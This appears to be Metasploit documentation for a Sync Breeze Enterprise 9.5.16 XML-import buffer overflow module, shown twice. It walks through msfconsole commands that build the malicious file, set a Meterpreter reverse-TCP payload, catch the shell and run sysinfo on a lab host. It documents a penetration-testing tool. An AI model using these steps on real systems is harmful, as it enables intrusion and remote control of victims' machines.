documentation/modules/exploit/windows/fileformat/syncbreeze_xml.md

This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file.

## Vulnerable Application

This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/e5c42cce3304c323776e4785e8fb4685-syncbreezeent_setup_v9.5.16.exe).

## Verification Steps

1. Start msfconsole
2. Do: `exploit/windows/fileformat/syncbreeze_xml`
3. Do: `set PAYLOAD [PAYLOAD]`
4. Do: `run`

## Example
```
msf > use exploit/windows/fileformat/syncbreeze_xml
msf exploit(windows/fileformat/syncbreeze_xml) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/syncbreeze_xml) > set LHOST 192.168.216.5 
LHOST => 192.168.216.5
msf exploit(windows/fileformat/syncbreeze_xml) > run

[*] Creating 'msf.xml' file ...
[+] msf.xml stored at /root/.msf4/local/msf.xml
msf exploit(windows/fileformat/syncbreeze_xml) > use exploit/multi/handler 
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.216.5 
LHOST => 192.168.216.5
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.216.5:4444 
[*] Sending stage (179779 bytes) to 192.168.216.137
[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.137:49830) at 2018-01-15 15:32:02 -0500

meterpreter > sysinfo 
Computer        : IE11WIN7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
```
Update and rename syncbreeze_xml.rb to syncbreeze_xml.md 2018-01-16 06:07:15 +00:00			`This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file.`

			`## Vulnerable Application`

			`This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/e5c42cce3304c323776e4785e8fb4685-syncbreezeent_setup_v9.5.16.exe).`

			`## Verification Steps`

			`1. Start msfconsole`
			2. Do: `exploit/windows/fileformat/syncbreeze_xml`
			3. Do: `set PAYLOAD [PAYLOAD]`
			4. Do: `run`

			`## Example`
			```
			`msf > use exploit/windows/fileformat/syncbreeze_xml`
			`msf exploit(windows/fileformat/syncbreeze_xml) > set PAYLOAD windows/meterpreter/reverse_tcp`
			`PAYLOAD => windows/meterpreter/reverse_tcp`
			`msf exploit(windows/fileformat/syncbreeze_xml) > set LHOST 192.168.216.5`
			`LHOST => 192.168.216.5`
			`msf exploit(windows/fileformat/syncbreeze_xml) > run`

			`[*] Creating 'msf.xml' file ...`
			`[+] msf.xml stored at /root/.msf4/local/msf.xml`
			`msf exploit(windows/fileformat/syncbreeze_xml) > use exploit/multi/handler`
			`msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp`
			`PAYLOAD => windows/meterpreter/reverse_tcp`
			`msf exploit(multi/handler) > set LHOST 192.168.216.5`
			`LHOST => 192.168.216.5`
			`msf exploit(multi/handler) > run`

			`[*] Started reverse TCP handler on 192.168.216.5:4444`
			`[*] Sending stage (179779 bytes) to 192.168.216.137`
			`[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.137:49830) at 2018-01-15 15:32:02 -0500`

			`meterpreter > sysinfo`
			`Computer : IE11WIN7`
			`OS : Windows 7 (Build 7601, Service Pack 1).`
			`Architecture : x86`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x86/windows`
			`meterpreter >`
			```